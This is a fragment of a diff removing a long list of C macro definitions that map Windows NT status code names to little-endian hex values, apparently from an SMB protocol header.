+-#define STATUS_TOO_MANY_ADDRESSES cpu_to_le32(0xC0000209)
+-#define STATUS_ADDRESS_ALREADY_EXISTS cpu_to_le32(0xC000020A)
+-#define STATUS_ADDRESS_CLOSED cpu_to_le32(0xC000020B)
+-#define STATUS_CONNECTION_DISCONNECTED cpu_to_le32(0xC000020C)
+-#define STATUS_CONNECTION_RESET cpu_to_le32(0xC000020D)
+-#define STATUS_TOO_MANY_NODES cpu_to_le32(0xC000020E)
+-#define STATUS_TRANSACTION_ABORTED cpu_to_le32(0xC000020F)
+-#define STATUS_TRANSACTION_TIMED_OUT cpu_to_le32(0xC0000210)
+-#define STATUS_TRANSACTION_NO_RELEASE cpu_to_le32(0xC0000211)
+-#define STATUS_TRANSACTION_NO_MATCH cpu_to_le32(0xC0000212)
+-#define STATUS_TRANSACTION_RESPONDED cpu_to_le32(0xC0000213)
+-#define STATUS_TRANSACTION_INVALID_ID cpu_to_le32(0xC0000214)
+-#define STATUS_TRANSACTION_INVALID_TYPE cpu_to_le32(0xC0000215)
+-#define STATUS_NOT_SERVER_SESSION cpu_to_le32(0xC0000216)
+-#define STATUS_NOT_CLIENT_SESSION cpu_to_le32(0xC0000217)
+-#define STATUS_CANNOT_LOAD_REGISTRY_FILE cpu_to_le32(0xC0000218)
+-#define STATUS_DEBUG_ATTACH_FAILED cpu_to_le32(0xC0000219)
+-#define STATUS_SYSTEM_PROCESS_TERMINATED cpu_to_le32(0xC000021A)
+-#define STATUS_DATA_NOT_ACCEPTED cpu_to_le32(0xC000021B)
+-#define STATUS_NO_BROWSER_SERVERS_FOUND cpu_to_le32(0xC000021C)
+-#define STATUS_VDM_HARD_ERROR cpu_to_le32(0xC000021D)
+-#define STATUS_DRIVER_CANCEL_TIMEOUT cpu_to_le32(0xC000021E)
+-#define STATUS_REPLY_MESSAGE_MISMATCH cpu_to_le32(0xC000021F)
+-#define STATUS_MAPPED_ALIGNMENT cpu_to_le32(0xC0000220)
+-#define STATUS_IMAGE_CHECKSUM_MISMATCH cpu_to_le32(0xC0000221)
+-#define STATUS_LOST_WRITEBEHIND_DATA cpu_to_le32(0xC0000222)
+-#define STATUS_CLIENT_SERVER_PARAMETERS_INVALID cpu_to_le32(0xC0000223)
+-#define STATUS_PASSWORD_MUST_CHANGE cpu_to_le32(0xC0000224)
+-#define STATUS_NOT_FOUND cpu_to_le32(0xC0000225)
+-#define STATUS_NOT_TINY_STREAM cpu_to_le32(0xC0000226)
+-#define STATUS_RECOVERY_FAILURE cpu_to_le32(0xC0000227)
+-#define STATUS_STACK_OVERFLOW_READ cpu_to_le32(0xC0000228)
+-#define STATUS_FAIL_CHECK cpu_to_le32(0xC0000229)
+-#define STATUS_DUPLICATE_OBJECTID cpu_to_le32(0xC000022A)
+-#define STATUS_OBJECTID_EXISTS cpu_to_le32(0xC000022B)
+-#define STATUS_CONVERT_TO_LARGE cpu_to_le32(0xC000022C)
+-#define STATUS_RETRY cpu_to_le32(0xC000022D)
+-#define STATUS_FOUND_OUT_OF_SCOPE cpu_to_le32(0xC000022E)
+-#define STATUS_ALLOCATE_BUCKET cpu_to_le32(0xC000022F)
+-#define STATUS_PROPSET_NOT_FOUND cpu_to_le32(0xC0000230)
+-#define STATUS_MARSHALL_OVERFLOW cpu_to_le32(0xC0000231)
+-#define STATUS_INVALID_VARIANT cpu_to_le32(0xC0000232)
+-#define STATUS_DOMAIN_CONTROLLER_NOT_FOUND cpu_to_le32(0xC0000233)
+-#define STATUS_ACCOUNT_LOCKED_OUT cpu_to_le32(0xC0000234)
+-#define STATUS_HANDLE_NOT_CLOSABLE cpu_to_le32(0xC0000235)
+-#define STATUS_CONNECTION_REFUSED cpu_to_le32(0xC0000236)
+-#define STATUS_GRACEFUL_DISCONNECT cpu_to_le32(0xC0000237)
+-#define STATUS_ADDRESS_ALREADY_ASSOCIATED cpu_to_le32(0xC0000238)
+-#define STATUS_ADDRESS_NOT_ASSOCIATED cpu_to_le32(0xC0000239)
+-#define STATUS_CONNECTION_INVALID cpu_to_le32(0xC000023A)
+-#define STATUS_CONNECTION_ACTIVE cpu_to_le32(0xC000023B)
+-#define STATUS_NETWORK_UNREACHABLE cpu_to_le32(0xC000023C)
+-#define STATUS_HOST_UNREACHABLE cpu_to_le32(0xC000023D)
+-#define STATUS_PROTOCOL_UNREACHABLE cpu_to_le32(0xC000023E)
+-#define STATUS_PORT_UNREACHABLE cpu_to_le32(0xC000023F)
+-#define STATUS_REQUEST_ABORTED cpu_to_le32(0xC0000240)
+-#define STATUS_CONNECTION_ABORTED cpu_to_le32(0xC0000241)
+-#define STATUS_BAD_COMPRESSION_BUFFER cpu_to_le32(0xC0000242)
+-#define STATUS_USER_MAPPED_FILE cpu_to_le32(0xC0000243)
+-#define STATUS_AUDIT_FAILED cpu_to_le32(0xC0000244)
+-#define STATUS_TIMER_RESOLUTION_NOT_SET cpu_to_le32(0xC0000245)
+-#define STATUS_CONNECTION_COUNT_LIMIT cpu_to_le32(0xC0000246)
+-#define STATUS_LOGIN_TIME_RESTRICTION cpu_to_le32(0xC0000247)
+-#define STATUS_LOGIN_WKSTA_RESTRICTION cpu_to_le32(0xC0000248)
+-#define STATUS_IMAGE_MP_UP_MISMATCH cpu_to_le32(0xC0000249)
+-#define STATUS_INSUFFICIENT_LOGON_INFO cpu_to_le32(0xC0000250)
+-#define STATUS_BAD_DLL_ENTRYPOINT cpu_to_le32(0xC0000251)
+-#define STATUS_BAD_SERVICE_ENTRYPOINT cpu_to_le32(0xC0000252)
+-#define STATUS_LPC_REPLY_LOST cpu_to_le32(0xC0000253)
+-#define STATUS_IP_ADDRESS_CONFLICT1 cpu_to_le32(0xC0000254)
+-#define STATUS_IP_ADDRESS_CONFLICT2 cpu_to_le32(0xC0000255)
+-#define STATUS_REGISTRY_QUOTA_LIMIT cpu_to_le32(0xC0000256)
+-#define STATUS_PATH_NOT_COVERED cpu_to_le32(0xC0000257)
+-#define STATUS_NO_CALLBACK_ACTIVE cpu_to_le32(0xC0000258)
+-#define STATUS_LICENSE_QUOTA_EXCEEDED cpu_to_le32(0xC0000259)
+-#define STATUS_PWD_TOO_SHORT cpu_to_le32(0xC000025A)
+-#define STATUS_PWD_TOO_RECENT cpu_to_le32(0xC000025B)
+-#define STATUS_PWD_HISTORY_CONFLICT cpu_to_le32(0xC000025C)
+-#define STATUS_PLUGPLAY_NO_DEVICE cpu_to_le32(0xC000025E)
+-#define STATUS_UNSUPPORTED_COMPRESSION cpu_to_le32(0xC000025F)
+-#define STATUS_INVALID_HW_PROFILE cpu_to_le32(0xC0000260)
+-#define STATUS_INVALID_PLUGPLAY_DEVICE_PATH cpu_to_le32(0xC0000261)
+-#define STATUS_DRIVER_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000262)
+-#define STATUS_DRIVER_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000263)
+-#define STATUS_RESOURCE_NOT_OWNED cpu_to_le32(0xC0000264)
+-#define STATUS_TOO_MANY_LINKS cpu_to_le32(0xC0000265)
+-#define STATUS_QUOTA_LIST_INCONSISTENT cpu_to_le32(0xC0000266)
+-#define STATUS_FILE_IS_OFFLINE cpu_to_le32(0xC0000267)
+-#define STATUS_EVALUATION_EXPIRATION cpu_to_le32(0xC0000268)
+-#define STATUS_ILLEGAL_DLL_RELOCATION cpu_to_le32(0xC0000269)
+-#define STATUS_LICENSE_VIOLATION cpu_to_le32(0xC000026A)
+-#define STATUS_DLL_INIT_FAILED_LOGOFF cpu_to_le32(0xC000026B)
+-#define STATUS_DRIVER_UNABLE_TO_LOAD cpu_to_le32(0xC000026C)
+-#define STATUS_DFS_UNAVAILABLE cpu_to_le32(0xC000026D)
+-#define STATUS_VOLUME_DISMOUNTED cpu_to_le32(0xC000026E)
+-#define STATUS_WX86_INTERNAL_ERROR cpu_to_le32(0xC000026F)
+-#define STATUS_WX86_FLOAT_STACK_CHECK cpu_to_le32(0xC0000270)
+-#define STATUS_VALIDATE_CONTINUE cpu_to_le32(0xC0000271)
+-#define STATUS_NO_MATCH cpu_to_le32(0xC0000272)
+-#define STATUS_NO_MORE_MATCHES cpu_to_le32(0xC0000273)
+-#define STATUS_NOT_A_REPARSE_POINT cpu_to_le32(0xC0000275)
+-#define STATUS_IO_REPARSE_TAG_INVALID cpu_to_le32(0xC0000276)
+-#define STATUS_IO_REPARSE_TAG_MISMATCH cpu_to_le32(0xC0000277)
+-#define STATUS_IO_REPARSE_DATA_INVALID cpu_to_le32(0xC0000278)
+-#define STATUS_IO_REPARSE_TAG_NOT_HANDLED cpu_to_le32(0xC0000279)
+-#define STATUS_REPARSE_POINT_NOT_RESOLVED cpu_to_le32(0xC0000280)
+-#define STATUS_DIRECTORY_IS_A_REPARSE_POINT cpu_to_le32(0xC0000281)
+-#define STATUS_RANGE_LIST_CONFLICT cpu_to_le32(0xC0000282)
+-#define STATUS_SOURCE_ELEMENT_EMPTY cpu_to_le32(0xC0000283)
+-#define STATUS_DESTINATION_ELEMENT_FULL cpu_to_le32(0xC0000284)
+-#define STATUS_ILLEGAL_ELEMENT_ADDRESS cpu_to_le32(0xC0000285)
+-#define STATUS_MAGAZINE_NOT_PRESENT cpu_to_le32(0xC0000286)
+-#define STATUS_REINITIALIZATION_NEEDED cpu_to_le32(0xC0000287)
+-#define STATUS_ENCRYPTION_FAILED cpu_to_le32(0xC000028A)
+-#define STATUS_DECRYPTION_FAILED cpu_to_le32(0xC000028B)
+-#define STATUS_RANGE_NOT_FOUND cpu_to_le32(0xC000028C)
+-#define STATUS_NO_RECOVERY_POLICY cpu_to_le32(0xC000028D)
+-#define STATUS_NO_EFS cpu_to_le32(0xC000028E)
+-#define STATUS_WRONG_EFS cpu_to_le32(0xC000028F)
+-#define STATUS_NO_USER_KEYS cpu_to_le32(0xC0000290)
+-#define STATUS_FILE_NOT_ENCRYPTED cpu_to_le32(0xC0000291)
+-#define STATUS_NOT_EXPORT_FORMAT cpu_to_le32(0xC0000292)
+-#define STATUS_FILE_ENCRYPTED cpu_to_le32(0xC0000293)
+-#define STATUS_WMI_GUID_NOT_FOUND cpu_to_le32(0xC0000295)
+-#define STATUS_WMI_INSTANCE_NOT_FOUND cpu_to_le32(0xC0000296)
+-#define STATUS_WMI_ITEMID_NOT_FOUND cpu_to_le32(0xC0000297)
+-#define STATUS_WMI_TRY_AGAIN cpu_to_le32(0xC0000298)
+-#define STATUS_SHARED_POLICY cpu_to_le32(0xC0000299)
+-#define STATUS_POLICY_OBJECT_NOT_FOUND cpu_to_le32(0xC000029A)
+-#define STATUS_POLICY_ONLY_IN_DS cpu_to_le32(0xC000029B)
+-#define STATUS_VOLUME_NOT_UPGRADED cpu_to_le32(0xC000029C)
+-#define STATUS_REMOTE_STORAGE_NOT_ACTIVE cpu_to_le32(0xC000029D)
+-#define STATUS_REMOTE_STORAGE_MEDIA_ERROR cpu_to_le32(0xC000029E)
+-#define STATUS_NO_TRACKING_SERVICE cpu_to_le32(0xC000029F)
+-#define STATUS_SERVER_SID_MISMATCH cpu_to_le32(0xC00002A0)
+-#define STATUS_DS_NO_ATTRIBUTE_OR_VALUE cpu_to_le32(0xC00002A1)
+-#define STATUS_DS_INVALID_ATTRIBUTE_SYNTAX cpu_to_le32(0xC00002A2)
+-#define STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED cpu_to_le32(0xC00002A3)
+-#define STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS cpu_to_le32(0xC00002A4)
+-#define STATUS_DS_BUSY cpu_to_le32(0xC00002A5)
+-#define STATUS_DS_UNAVAILABLE cpu_to_le32(0xC00002A6)
+-#define STATUS_DS_NO_RIDS_ALLOCATED cpu_to_le32(0xC00002A7)
+-#define STATUS_DS_NO_MORE_RIDS cpu_to_le32(0xC00002A8)
+-#define STATUS_DS_INCORRECT_ROLE_OWNER cpu_to_le32(0xC00002A9)
+-#define STATUS_DS_RIDMGR_INIT_ERROR cpu_to_le32(0xC00002AA)
+-#define STATUS_DS_OBJ_CLASS_VIOLATION cpu_to_le32(0xC00002AB)
+-#define STATUS_DS_CANT_ON_NON_LEAF cpu_to_le32(0xC00002AC)
+-#define STATUS_DS_CANT_ON_RDN cpu_to_le32(0xC00002AD)
+-#define STATUS_DS_CANT_MOD_OBJ_CLASS cpu_to_le32(0xC00002AE)
+-#define STATUS_DS_CROSS_DOM_MOVE_FAILED cpu_to_le32(0xC00002AF)
+-#define STATUS_DS_GC_NOT_AVAILABLE cpu_to_le32(0xC00002B0)
+-#define STATUS_DIRECTORY_SERVICE_REQUIRED cpu_to_le32(0xC00002B1)
+-#define STATUS_REPARSE_ATTRIBUTE_CONFLICT cpu_to_le32(0xC00002B2)
+-#define STATUS_CANT_ENABLE_DENY_ONLY cpu_to_le32(0xC00002B3)
+-#define STATUS_FLOAT_MULTIPLE_FAULTS cpu_to_le32(0xC00002B4)
+-#define STATUS_FLOAT_MULTIPLE_TRAPS cpu_to_le32(0xC00002B5)
+-#define STATUS_DEVICE_REMOVED cpu_to_le32(0xC00002B6)
+-#define STATUS_JOURNAL_DELETE_IN_PROGRESS cpu_to_le32(0xC00002B7)
+-#define STATUS_JOURNAL_NOT_ACTIVE cpu_to_le32(0xC00002B8)
+-#define STATUS_NOINTERFACE cpu_to_le32(0xC00002B9)
+-#define STATUS_DS_ADMIN_LIMIT_EXCEEDED cpu_to_le32(0xC00002C1)
+-#define STATUS_DRIVER_FAILED_SLEEP cpu_to_le32(0xC00002C2)
+-#define STATUS_MUTUAL_AUTHENTICATION_FAILED cpu_to_le32(0xC00002C3)
+-#define STATUS_CORRUPT_SYSTEM_FILE cpu_to_le32(0xC00002C4)
+-#define STATUS_DATATYPE_MISALIGNMENT_ERROR cpu_to_le32(0xC00002C5)
+-#define STATUS_WMI_READ_ONLY cpu_to_le32(0xC00002C6)
+-#define STATUS_WMI_SET_FAILURE cpu_to_le32(0xC00002C7)
+-#define STATUS_COMMITMENT_MINIMUM cpu_to_le32(0xC00002C8)
+-#define STATUS_REG_NAT_CONSUMPTION cpu_to_le32(0xC00002C9)
+-#define STATUS_TRANSPORT_FULL cpu_to_le32(0xC00002CA)
+-#define STATUS_DS_SAM_INIT_FAILURE cpu_to_le32(0xC00002CB)
+-#define STATUS_ONLY_IF_CONNECTED cpu_to_le32(0xC00002CC)
+-#define STATUS_DS_SENSITIVE_GROUP_VIOLATION cpu_to_le32(0xC00002CD)
+-#define STATUS_PNP_RESTART_ENUMERATION cpu_to_le32(0xC00002CE)
+-#define STATUS_JOURNAL_ENTRY_DELETED cpu_to_le32(0xC00002CF)
+-#define STATUS_DS_CANT_MOD_PRIMARYGROUPID cpu_to_le32(0xC00002D0)
+-#define STATUS_SYSTEM_IMAGE_BAD_SIGNATURE cpu_to_le32(0xC00002D1)
+-#define STATUS_PNP_REBOOT_REQUIRED cpu_to_le32(0xC00002D2)
+-#define STATUS_POWER_STATE_INVALID cpu_to_le32(0xC00002D3)
+-#define STATUS_DS_INVALID_GROUP_TYPE cpu_to_le32(0xC00002D4)
+-#define STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D5)
+-#define STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D6)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D7)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC00002D8)
+-#define STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D9)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER cpu_to_le32(0xC00002DA)
+-#define STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER cpu_to_le32(0xC00002DB)
+-#define STATUS_DS_HAVE_PRIMARY_MEMBERS cpu_to_le32(0xC00002DC)
+-#define STATUS_WMI_NOT_SUPPORTED cpu_to_le32(0xC00002DD)
+-#define STATUS_INSUFFICIENT_POWER cpu_to_le32(0xC00002DE)
+-#define STATUS_SAM_NEED_BOOTKEY_PASSWORD cpu_to_le32(0xC00002DF)
+-#define STATUS_SAM_NEED_BOOTKEY_FLOPPY cpu_to_le32(0xC00002E0)
+-#define STATUS_DS_CANT_START cpu_to_le32(0xC00002E1)
+-#define STATUS_DS_INIT_FAILURE cpu_to_le32(0xC00002E2)
+-#define STATUS_SAM_INIT_FAILURE cpu_to_le32(0xC00002E3)
+-#define STATUS_DS_GC_REQUIRED cpu_to_le32(0xC00002E4)
+-#define STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY cpu_to_le32(0xC00002E5)
+-#define STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS cpu_to_le32(0xC00002E6)
+-#define STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED cpu_to_le32(0xC00002E7)
+-#define STATUS_MULTIPLE_FAULT_VIOLATION cpu_to_le32(0xC00002E8)
+-#define STATUS_CURRENT_DOMAIN_NOT_ALLOWED cpu_to_le32(0xC00002E9)
+-#define STATUS_CANNOT_MAKE cpu_to_le32(0xC00002EA)
+-#define STATUS_SYSTEM_SHUTDOWN cpu_to_le32(0xC00002EB)
+-#define STATUS_DS_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002EC)
+-#define STATUS_DS_SAM_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002ED)
+-#define STATUS_UNFINISHED_CONTEXT_DELETED cpu_to_le32(0xC00002EE)
+-#define STATUS_NO_TGT_REPLY cpu_to_le32(0xC00002EF)
+-#define STATUS_OBJECTID_NOT_FOUND cpu_to_le32(0xC00002F0)
+-#define STATUS_NO_IP_ADDRESSES cpu_to_le32(0xC00002F1)
+-#define STATUS_WRONG_CREDENTIAL_HANDLE cpu_to_le32(0xC00002F2)
+-#define STATUS_CRYPTO_SYSTEM_INVALID cpu_to_le32(0xC00002F3)
+-#define STATUS_MAX_REFERRALS_EXCEEDED cpu_to_le32(0xC00002F4)
+-#define STATUS_MUST_BE_KDC cpu_to_le32(0xC00002F5)
+-#define STATUS_STRONG_CRYPTO_NOT_SUPPORTED cpu_to_le32(0xC00002F6)
+-#define STATUS_TOO_MANY_PRINCIPALS cpu_to_le32(0xC00002F7)
+-#define STATUS_NO_PA_DATA cpu_to_le32(0xC00002F8)
+-#define STATUS_PKINIT_NAME_MISMATCH cpu_to_le32(0xC00002F9)
+-#define STATUS_SMARTCARD_LOGON_REQUIRED cpu_to_le32(0xC00002FA)
+-#define STATUS_KDC_INVALID_REQUEST cpu_to_le32(0xC00002FB)
+-#define STATUS_KDC_UNABLE_TO_REFER cpu_to_le32(0xC00002FC)
+-#define STATUS_KDC_UNKNOWN_ETYPE cpu_to_le32(0xC00002FD)
+-#define STATUS_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FE)
+-#define STATUS_SERVER_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FF)
+-#define STATUS_NOT_SUPPORTED_ON_SBS cpu_to_le32(0xC0000300)
+-#define STATUS_WMI_GUID_DISCONNECTED cpu_to_le32(0xC0000301)
+-#define STATUS_WMI_ALREADY_DISABLED cpu_to_le32(0xC0000302)
+-#define STATUS_WMI_ALREADY_ENABLED cpu_to_le32(0xC0000303)
+-#define STATUS_MFT_TOO_FRAGMENTED cpu_to_le32(0xC0000304)
+-#define STATUS_COPY_PROTECTION_FAILURE cpu_to_le32(0xC0000305)
+-#define STATUS_CSS_AUTHENTICATION_FAILURE cpu_to_le32(0xC0000306)
+-#define STATUS_CSS_KEY_NOT_PRESENT cpu_to_le32(0xC0000307)
+-#define STATUS_CSS_KEY_NOT_ESTABLISHED cpu_to_le32(0xC0000308)
+-#define STATUS_CSS_SCRAMBLED_SECTOR cpu_to_le32(0xC0000309)
+-#define STATUS_CSS_REGION_MISMATCH cpu_to_le32(0xC000030A)
+-#define STATUS_CSS_RESETS_EXHAUSTED cpu_to_le32(0xC000030B)
+-#define STATUS_PKINIT_FAILURE cpu_to_le32(0xC0000320)
+-#define STATUS_SMARTCARD_SUBSYSTEM_FAILURE cpu_to_le32(0xC0000321)
+-#define STATUS_NO_KERB_KEY cpu_to_le32(0xC0000322)
+-#define STATUS_HOST_DOWN cpu_to_le32(0xC0000350)
+-#define STATUS_UNSUPPORTED_PREAUTH cpu_to_le32(0xC0000351)
+-#define STATUS_EFS_ALG_BLOB_TOO_BIG cpu_to_le32(0xC0000352)
+-#define STATUS_PORT_NOT_SET cpu_to_le32(0xC0000353)
+-#define STATUS_DEBUGGER_INACTIVE cpu_to_le32(0xC0000354)
+-#define STATUS_DS_VERSION_CHECK_FAILURE cpu_to_le32(0xC0000355)
+-#define STATUS_AUDITING_DISABLED cpu_to_le32(0xC0000356)
+-#define STATUS_PRENT4_MACHINE_ACCOUNT cpu_to_le32(0xC0000357)
+-#define STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC0000358)
+-#define STATUS_INVALID_IMAGE_WIN_32 cpu_to_le32(0xC0000359)
+-#define STATUS_INVALID_IMAGE_WIN_64 cpu_to_le32(0xC000035A)
+-#define STATUS_BAD_BINDINGS cpu_to_le32(0xC000035B)
+-#define STATUS_NETWORK_SESSION_EXPIRED cpu_to_le32(0xC000035C)
+-#define STATUS_APPHELP_BLOCK cpu_to_le32(0xC000035D)
+-#define STATUS_ALL_SIDS_FILTERED cpu_to_le32(0xC000035E)
+-#define STATUS_NOT_SAFE_MODE_DRIVER cpu_to_le32(0xC000035F)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT cpu_to_le32(0xC0000361)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_PATH cpu_to_le32(0xC0000362)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER cpu_to_le32(0xC0000363)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_OTHER cpu_to_le32(0xC0000364)
+-#define STATUS_FAILED_DRIVER_ENTRY cpu_to_le32(0xC0000365)
+-#define STATUS_DEVICE_ENUMERATION_ERROR cpu_to_le32(0xC0000366)
+-#define STATUS_MOUNT_POINT_NOT_RESOLVED cpu_to_le32(0xC0000368)
+-#define STATUS_INVALID_DEVICE_OBJECT_PARAMETER cpu_to_le32(0xC0000369)
+-#define STATUS_MCA_OCCURED cpu_to_le32(0xC000036A)
+-#define STATUS_DRIVER_BLOCKED_CRITICAL cpu_to_le32(0xC000036B)
+-#define STATUS_DRIVER_BLOCKED cpu_to_le32(0xC000036C)
+-#define STATUS_DRIVER_DATABASE_ERROR cpu_to_le32(0xC000036D)
+-#define STATUS_SYSTEM_HIVE_TOO_LARGE cpu_to_le32(0xC000036E)
+-#define STATUS_INVALID_IMPORT_OF_NON_DLL cpu_to_le32(0xC000036F)
+-#define STATUS_NO_SECRETS cpu_to_le32(0xC0000371)
+-#define STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY cpu_to_le32(0xC0000372)
+-#define STATUS_FAILED_STACK_SWITCH cpu_to_le32(0xC0000373)
+-#define STATUS_HEAP_CORRUPTION cpu_to_le32(0xC0000374)
+-#define STATUS_SMARTCARD_WRONG_PIN cpu_to_le32(0xC0000380)
+-#define STATUS_SMARTCARD_CARD_BLOCKED cpu_to_le32(0xC0000381)
+-#define STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED cpu_to_le32(0xC0000382)
+-#define STATUS_SMARTCARD_NO_CARD cpu_to_le32(0xC0000383)
+-#define STATUS_SMARTCARD_NO_KEY_CONTAINER cpu_to_le32(0xC0000384)
+-#define STATUS_SMARTCARD_NO_CERTIFICATE cpu_to_le32(0xC0000385)
+-#define STATUS_SMARTCARD_NO_KEYSET cpu_to_le32(0xC0000386)
+-#define STATUS_SMARTCARD_IO_ERROR cpu_to_le32(0xC0000387)
+-#define STATUS_DOWNGRADE_DETECTED cpu_to_le32(0xC0000388)
+-#define STATUS_SMARTCARD_CERT_REVOKED cpu_to_le32(0xC0000389)
+-#define STATUS_ISSUING_CA_UNTRUSTED cpu_to_le32(0xC000038A)
+-#define STATUS_REVOCATION_OFFLINE_C cpu_to_le32(0xC000038B)
+-#define STATUS_PKINIT_CLIENT_FAILURE cpu_to_le32(0xC000038C)
+-#define STATUS_SMARTCARD_CERT_EXPIRED cpu_to_le32(0xC000038D)
+-#define STATUS_DRIVER_FAILED_PRIOR_UNLOAD cpu_to_le32(0xC000038E)
+-#define STATUS_SMARTCARD_SILENT_CONTEXT cpu_to_le32(0xC000038F)
+-#define STATUS_PER_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000401)
+-#define STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000402)
+-#define STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000403)
+-#define STATUS_DS_NAME_NOT_UNIQUE cpu_to_le32(0xC0000404)
+-#define STATUS_DS_DUPLICATE_ID_FOUND cpu_to_le32(0xC0000405)
+-#define STATUS_DS_GROUP_CONVERSION_ERROR cpu_to_le32(0xC0000406)
+-#define STATUS_VOLSNAP_PREPARE_HIBERNATE cpu_to_le32(0xC0000407)
+-#define STATUS_USER2USER_REQUIRED cpu_to_le32(0xC0000408)
+-#define STATUS_STACK_BUFFER_OVERRUN cpu_to_le32(0xC0000409)
+-#define STATUS_NO_S4U_PROT_SUPPORT cpu_to_le32(0xC000040A)
+-#define STATUS_CROSSREALM_DELEGATION_FAILURE cpu_to_le32(0xC000040B)
+-#define STATUS_REVOCATION_OFFLINE_KDC cpu_to_le32(0xC000040C)
+-#define STATUS_ISSUING_CA_UNTRUSTED_KDC cpu_to_le32(0xC000040D)
+-#define STATUS_KDC_CERT_EXPIRED cpu_to_le32(0xC000040E)
+-#define STATUS_KDC_CERT_REVOKED cpu_to_le32(0xC000040F)
+-#define STATUS_PARAMETER_QUOTA_EXCEEDED cpu_to_le32(0xC0000410)
+-#define STATUS_HIBERNATION_FAILURE cpu_to_le32(0xC0000411)
+-#define STATUS_DELAY_LOAD_FAILED cpu_to_le32(0xC0000412)
+-#define STATUS_AUTHENTICATION_FIREWALL_FAILED cpu_to_le32(0xC0000413)
+-#define STATUS_VDM_DISALLOWED cpu_to_le32(0xC0000414)
+-#define STATUS_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC0000415)
+-#define STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE cpu_to_le32(0xC0000416)
+-#define STATUS_INVALID_CRUNTIME_PARAMETER cpu_to_le32(0xC0000417)
+-#define STATUS_NTLM_BLOCKED cpu_to_le32(0xC0000418)
+-#define STATUS_ASSERTION_FAILURE cpu_to_le32(0xC0000420)
+-#define STATUS_VERIFIER_STOP cpu_to_le32(0xC0000421)
+-#define STATUS_CALLBACK_POP_STACK cpu_to_le32(0xC0000423)
+-#define STATUS_INCOMPATIBLE_DRIVER_BLOCKED cpu_to_le32(0xC0000424)
+-#define STATUS_HIVE_UNLOADED cpu_to_le32(0xC0000425)
+-#define STATUS_COMPRESSION_DISABLED cpu_to_le32(0xC0000426)
+-#define STATUS_FILE_SYSTEM_LIMITATION cpu_to_le32(0xC0000427)
+-#define STATUS_INVALID_IMAGE_HASH cpu_to_le32(0xC0000428)
+-#define STATUS_NOT_CAPABLE cpu_to_le32(0xC0000429)
+-#define STATUS_REQUEST_OUT_OF_SEQUENCE cpu_to_le32(0xC000042A)
+-#define STATUS_IMPLEMENTATION_LIMIT cpu_to_le32(0xC000042B)
+-#define STATUS_ELEVATION_REQUIRED cpu_to_le32(0xC000042C)
+-#define STATUS_BEYOND_VDL cpu_to_le32(0xC0000432)
+-#define STATUS_ENCOUNTERED_WRITE_IN_PROGRESS cpu_to_le32(0xC0000433)
+-#define STATUS_PTE_CHANGED cpu_to_le32(0xC0000434)
+-#define STATUS_PURGE_FAILED cpu_to_le32(0xC0000435)
+-#define STATUS_CRED_REQUIRES_CONFIRMATION cpu_to_le32(0xC0000440)
+-#define STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE cpu_to_le32(0xC0000441)
+-#define STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER cpu_to_le32(0xC0000442)
+-#define STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE cpu_to_le32(0xC0000443)
+-#define STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE cpu_to_le32(0xC0000444)
+-#define STATUS_CS_ENCRYPTION_FILE_NOT_CSE cpu_to_le32(0xC0000445)
+-#define STATUS_INVALID_LABEL cpu_to_le32(0xC0000446)
+-#define STATUS_DRIVER_PROCESS_TERMINATED cpu_to_le32(0xC0000450)
+-#define STATUS_AMBIGUOUS_SYSTEM_DEVICE cpu_to_le32(0xC0000451)
+-#define STATUS_SYSTEM_DEVICE_NOT_FOUND cpu_to_le32(0xC0000452)
+-#define STATUS_RESTART_BOOT_APPLICATION cpu_to_le32(0xC0000453)
+-#define STATUS_INVALID_TASK_NAME cpu_to_le32(0xC0000500)
+-#define STATUS_INVALID_TASK_INDEX cpu_to_le32(0xC0000501)
+-#define STATUS_THREAD_ALREADY_IN_TASK cpu_to_le32(0xC0000502)
+-#define STATUS_CALLBACK_BYPASS cpu_to_le32(0xC0000503)
+-#define STATUS_PORT_CLOSED cpu_to_le32(0xC0000700)
+-#define STATUS_MESSAGE_LOST cpu_to_le32(0xC0000701)
+-#define STATUS_INVALID_MESSAGE cpu_to_le32(0xC0000702)
+-#define STATUS_REQUEST_CANCELED cpu_to_le32(0xC0000703)
+-#define STATUS_RECURSIVE_DISPATCH cpu_to_le32(0xC0000704)
